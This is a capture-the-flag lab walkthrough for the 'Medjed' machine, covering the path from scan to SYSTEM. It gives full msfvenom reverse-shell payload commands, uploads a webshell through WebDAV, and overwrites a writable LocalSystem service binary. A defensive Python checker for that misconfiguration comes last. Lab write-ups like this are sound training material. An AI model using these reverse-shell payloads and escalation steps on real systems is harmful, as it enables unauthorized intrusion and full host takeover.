Proving Grounds Practice - Medjed

Difficulty

Medium

Scans

autorecon

[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] microsoft-ds found on tcp/445.


[*] mysql found on tcp/3306.
MariaDB


[*] http-alt found on tcp/8000.
Server: BarracudaServer.com (Windows)
+ OPTIONS: WebDAV enabled (MKCOL LOCK COPY PROPPATCH PROPFIND UNLOCK listed as allowed).

[*] unknown found on tcp/5040.

[*] ftp found on tcp/30021.
FileZilla ftpd 0.9.41 beta
Anonymous login allowed

[*] unknown found on tcp/33033.
sugid

[*] unknown found on tcp/44330.
ssl: 8000


[*] http found on tcp/45332.
Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
Quiz App
http://192.168.111.127:45332/phpinfo.php
Loaded Configuration File C:\xampp\php\php.ini
Zend Engine v3.3.23
TMP \xampp\tmp
SQLite Library 3.28.0


[*] http found on tcp/45443.
Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
seems like 45332

[*] msrpc found on tcp/49664.
[*] msrpc found on tcp/49665.
[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49668.
[*] msrpc found on tcp/49669.

445 smb

Anonymous users cannot log in.

30021 ftp

Anonymous login works, and the share looks like a project checkout. Mirror everything with lftp: `lftp -e "mirror -c -e / ftp" ftp://192.168.111.127:30021`, but nothing of value was found in it.

ftp -a -A 192.168.111.127 -p 30021
Connected to 192.168.111.127.
220-FileZilla Server version 0.9.41 beta
220-written by Tim Kosse ([email protected])
220 Please visit http://sourceforge.net/projects/filezilla/
331 Password required for anonymous
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||49905|)
150 Connection accepted
-r--r--r-- 1 ftp ftp 536 Nov 03 2020 .gitignore
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 app
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 bin
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 config
-r--r--r-- 1 ftp ftp 130 Nov 03 2020 config.ru
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 db
-r--r--r-- 1 ftp ftp 1750 Nov 03 2020 Gemfile
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 lib
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 log
-r--r--r-- 1 ftp ftp 66 Nov 03 2020 package.json
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 public
-r--r--r-- 1 ftp ftp 227 Nov 03 2020 Rakefile
-r--r--r-- 1 ftp ftp 374 Nov 03 2020 README.md
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 test
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 tmp
drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 vendor
226 Transfer OK
ftp>

8000/44330 BarracudaServer

`nikto -ask=no -Tuning=x4567890ac -nointeractive -host http://192.168.111.127:8000 2>&1` reports that WebDAV is enabled, so uploading files may be possible.

Opening the link in a browser, the About page shows the version: BarracudaDrive 6.5.

searchsploit BarracudaDrive

The Description section explains why: the bd service runs as LocalSystem, so if bd.exe can be replaced, a reboot gives privilege escalation. Very useful information; try it later during escalation.

33033

Found some usernames; save them, they may be useful later. The Login link in the top right leads to a login page, which has a Forgot Password button.

Entering a username, the reminder word and a new password resets the password. Tried the usernames above with their slogans, without success. (The intended solution actually resets jerren's password: the reminder is paranoid, a keyword from the slogan, and then uses SQL injection to write a webshell.)

45332/45443

nikto found phpinfo.php; the wordlist used with gobuster did not pick it up.

Foothold

Back to WebDAV: visiting https://192.168.111.127:44330/ brings up a Set Administrator Account page. Enter admin:password with any email, then proceed to the web file server.

Clicking fs opens https://192.168.111.127:44330/fs/, which turns out to allow browsing any directory. Using the directory information from the phpinfo on port 45332, navigate to https://192.168.111.127:44330/fs/c/xampp/htdocs/, generate a webshell with `msfvenom -p php/reverse_php LHOST=192.168.45.165 LPORT=8000 -f raw -o r.php`, upload it, and request it to get a shell.

rlwrap nc -nvlp 8000
listening on [any] 8000 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.111.127] 49886
whoami
medjed\jerren

Escalation

Following the steps in 48789.txt, check the permissions of the bd service and bd.exe; they match exactly. Generate a replacement with `msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f exe -o bd.exe`, overwrite bd.exe, reboot with `shutdown /r /t 0`, and a reverse shell comes back.

## Insecure Folder Permission
C:\>cacls C:\bd
C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
C:\>cacls C:\bd\bd.exe
C:\bd\bd.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C

C:\>sc qc bd
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: bd
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\bd\bd.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BarracudaDrive ( bd ) service
DEPENDENCIES : Tcpip
SERVICE_START_NAME : LocalSystem
rlwrap nc -nvlp 443
listening on [any] 443 ...

connect to [192.168.45.165] from (UNKNOWN) [192.168.111.127] 49668
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami
whoami
nt authority\system
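As an added defender-side check, not part of the original write-up, the following Python script parses the `sc qc` and `cacls` output shown in the escalation section and flags exactly the misconfiguration exploited above: a service running as LocalSystem whose binary is writable by Authenticated Users. It assumes cacls-style output as captured here; the hardened ACL at the end is constructed for comparison.

```python
import re

# Principals every logged-on local user belongs to; write rights for them are the finding.
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
WRITE_RIGHTS = {"F", "C", "W"}   # cacls letters: Full, Change, Write
PRIVILEGED = {"localsystem", "nt authority\\system"}

def parse_cacls(path, text):
    """Yield (principal, flags, right) per ACE; cacls prints the path only on the first line."""
    for line in text.strip().splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        principal, _, rights = line.rpartition(":")
        yield principal.lower(), set(re.findall(r"\(([A-Z]+)\)", rights)), rights[-1:]

def low_priv_can_write(path, cacls_text):
    """True if a low-privileged principal holds Full/Change/Write on the object itself.
    (IO) marks inherit-only ACEs that apply to children, not this object, so skip them."""
    return any(p in LOW_PRIV and r in WRITE_RIGHTS and "IO" not in f
               for p, f, r in parse_cacls(path, cacls_text))

def parse_sc_qc(text):
    """Service account and unquoted binary path from `sc qc` output."""
    acct = re.search(r"SERVICE_START_NAME\s*:\s*(\S+)", text).group(1)
    binary = re.search(r'BINARY_PATH_NAME\s*:\s*"?([^"\r\n]+?)"?\s*$', text, re.M).group(1)
    return acct, binary

def assess(sc_text, binary_acl):
    """The write-up's condition: a privileged service whose binary low-priv users can replace."""
    acct, binary = parse_sc_qc(sc_text)
    finding = {"binary": binary, "account": acct,
               "runs_privileged": acct.lower() in PRIVILEGED,
               "binary_writable": low_priv_can_write(binary, binary_acl)}
    finding["escalation_risk"] = finding["runs_privileged"] and finding["binary_writable"]
    return finding

# Sample input: the `sc qc bd` and `cacls C:\bd\bd.exe` output captured on the box.
SC_QC = r"""SERVICE_NAME: bd
BINARY_PATH_NAME : "C:\bd\bd.exe"
SERVICE_START_NAME : LocalSystem"""
BINARY_ACL = r"""C:\bd\bd.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C"""
# Constructed hardened ACL for comparison: only Administrators and SYSTEM may change the file.
HARDENED_ACL = r"""C:\bd\bd.exe BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Users:R"""
```

Calling `assess(SC_QC, BINARY_ACL)` reports `escalation_risk: True` for the captured ACL and `False` for the hardened one; the same parser can be pointed at `cacls`/`sc qc` output collected from any host.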